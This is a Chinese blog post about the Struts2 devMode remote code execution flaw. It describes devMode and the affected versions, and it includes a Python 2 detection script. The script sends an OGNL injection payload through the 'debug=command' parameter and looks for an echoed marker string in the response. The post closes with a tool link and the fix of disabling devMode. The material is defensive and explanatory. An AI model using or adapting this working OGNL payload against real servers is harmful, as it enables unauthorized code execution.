• Struts2 devMode远程代码执行漏洞检测利用


    Apache Struts 2是世界上最流行的Java Web服务器框架之一,当Struts2开启devMode模式时,将导致严重远程代码执行漏洞。如果WebService 启动权限为最高权限时,可远程执行任意命令,包括关机、建立新用户、以及删除服务器上所有文件等等。

    什么是devMode?

    所谓的devMode模式,看名称也知道,是为Struts2开发人员调试程序准备的,在此模式下可以方便地查看日志等信息。默认情况下,devMode模式是关闭的。不过实际上仍然有很多网站上线的时候就赤裸裸地采用devMode模式,自然面临更大的安全问题,需要尽快修复。

    影响范围:

    当Struts开启devMode时,该漏洞将影响Struts 2.1.0–2.5.1,通杀Struts2所有版本。

    漏洞检测

    POC:

    #!/usr/bin/env python
    #coding:utf-8 -*-
    import sys
    import getopt
    import urllib 
    import urllib2
    
    
    poc = "debug=command&expression=(%23wr%3D%23context%5B%23parameters.obj%5B0%5D%5D.getWriter())!%3D(%23wr.println(%23parameters.content%5B0%5D))!%3D(%23wr.flush())!%3D(%23wr.close())&obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&content=Adlabgsrc"
    
    banner = '''
    # S2-devMode 检测工具
    #修复建议 : 关闭devMode模式
    #使用说明: 
    检测命令 python s2-devmode.py -u http://localhost:8080/orders/3/xxx/
        例如 python s2-adlab.py -u http://223.22.22.22:8080/example/HelloWorld.action
    帮助信息 python s2-devmode.py -h  
    
    '''
    def usage():
    	print banner
    def send_poc(geturl,data):
    	try:
    		user_agent = 'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)' 
    		headers = { 'User-Agent' : user_agent,
    				'Cookie'	: ""} 
    		req = urllib2.Request(geturl+"?"+data, headers=headers) 
    		response = urllib2.urlopen(req) 
    		content = response.read()
    		if  "Adlabgsrc" in content:
    			print "该网站存在s2-devmode代码执行漏洞,请及时修复"
    			return True
    		else:
    			print "该网站安全"
    			return False
    	
    	except urllib2.URLError, e:
    		#print e.reason
    		pass
    	return False
    	
    def check_vul(url):
    	if url.find("http://") | url.find("https://"):						
    		send_poc(url,poc)
    					
    	
    if __name__ == '__main__':
    
    	opts, args = getopt.getopt(sys.argv[1:], "hu:o:")
    	for op, value in opts:
    		if op == "-u":
    			target_url = value	
    			check_vul(target_url)
    		elif op == "-h":
    			usage()	

    工具检测

    下载地址:https://download.csdn.net/download/fly_hps/10849679

    修复方案:

    关闭devMode:在struts.xml 设置

    总会有不期而遇的温暖. 和生生不息的希望。
  • 相关阅读:
    C语言 · 新生舞会
    C语言 · 集合运算
    C语言 · 字符串的展开
    C语言 · 学做菜
    C语言 · 最长公共子序列 · 最长字符序列
    C语言 · 复数求和
    C语言 · 扶老奶奶过街
    C语言 · 删除重复元素
    1-3
    1-4
  • 原文地址:https://www.cnblogs.com/devi1/p/13486636.html
Copyright © 2020-2023  润新知